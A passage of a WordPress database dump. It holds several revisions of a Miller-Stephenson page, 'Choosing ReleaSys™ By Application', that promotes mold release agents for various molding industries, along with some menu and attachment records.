v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-02 14:42:22', '2017-06-02 14:42:22', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4429, 2, '2017-06-02 16:00:37', '2017-06-02 16:00:37', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-02 16:00:37', '2017-06-02 16:00:37', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4430, 3, '2017-06-02 16:06:36', '2017-06-02 16:06:36', '', 'shutterstock_525972979', '', 'inherit', 'closed', 'closed', '', 'shutterstock_525972979', '', '', '2017-06-02 16:06:36', '2017-06-02 16:06:36', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_525972979.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4431, 3, '2017-06-02 16:24:34', '2017-06-02 16:24:34', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.  We understand that not every "off-the-shelf" product is right for each customer.  Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-02 16:24:34', '2017-06-02 16:24:34', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4432, 3, '2017-06-02 16:26:31', '2017-06-02 16:26:31', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-02 16:26:31', '2017-06-02 16:26:31', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4433, 1, '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 'Krytox & Other Lubricants', '', 'publish', 'closed', 'closed', '', 'krytox-other-lubricants', '', '', '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 0, 'https://www.miller-stephenson.com/?p=4433', 3, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4434, 1, '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 'Industrial/Medical Coatings', '', 'publish', 'closed', 'closed', '', 'industrialmedical-coatings', '', '', '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 0, 'https://www.miller-stephenson.com/?p=4434', 5, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4435, 1, '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 'Conformal Coatings', '', 'publish', 'closed', 'closed', '', 'conformal-coatings', '', '', '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 0, 'https://www.miller-stephenson.com/?p=4435', 6, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4436, 1, '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 'Epoxy Resin Systems', '', 'publish', 'closed', 'closed', '', 'epoxy-resin-systems', '', '', '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 0, 'https://www.miller-stephenson.com/?p=4436', 7, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4437, 1, '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 'Medical Products', '', 'publish', 'closed', 'closed', '', 'medical-products', '', '', '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 0, 'https://www.miller-stephenson.com/?p=4437', 8, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4438, 1, '2017-06-02 16:31:20', '2017-06-02 16:31:20', '', 'Vazo Radical Initiators', '', 'publish', 'closed', 'closed', '', 'vazo-radical-initiators', '', '', '2017-06-02 16:31:20', '2017-06-02 16:31:20', '', 0, 'https://www.miller-stephenson.com/?p=4438', 9, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4439, 1, '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 'Mold Release Agents', '', 'publish', 'closed', 'closed', '', 'mold-release-agents', '', '', '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 0, 'https://www.miller-stephenson.com/?p=4439', 4, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4440, 3, '2017-06-02 16:30:37', '2017-06-02 16:30:37', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button 